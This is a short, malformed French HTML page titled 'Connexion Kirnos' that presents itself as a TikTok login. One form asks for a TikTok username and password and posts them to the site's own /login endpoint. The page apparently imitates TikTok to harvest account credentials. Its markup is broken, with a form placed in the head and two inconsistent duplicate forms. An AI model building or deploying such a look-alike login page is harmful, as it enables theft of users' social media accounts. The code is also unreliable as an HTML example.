<!DOCTYPE html>
<html>
<head>

<meta charset="UTF-8">
<title>Connexion Kirnos</title>

<form action="/login" method="post">

<input type="text" name="username" placeholder="Nom TikTok">

<input type="password" name="password" placeholder="Mot de passe">

<button>Connexion</button>

</form>

<style>

body{
background:#0b0b0b;
color:white;
font-family:Arial;
display:flex;
align-items:center;
justify-content:center;
height:100vh;
}

.box{
background:#111;
padding:40px;
border-radius:10px;
text-align:center;
box-shadow:0 0 25px red;
}

input{
padding:12px;
border:none;
border-radius:6px;
margin-top:15px;
width:250px;
}

button{
margin-top:20px;
padding:12px 25px;
background:#ff2a2a;
border:none;
border-radius:25px;
color:white;
font-weight:bold;
cursor:pointer;
}

</style>

</head>

<body>

<div class="box">

<h2>Connexion TikTok</h2>

<form action="/login" method="post">

<input name="username" placeholder="Pseudo TikTok">

<br>

<button type="submit">
Accéder au dashboard
</button>

</form>

</div>

</body>
</html>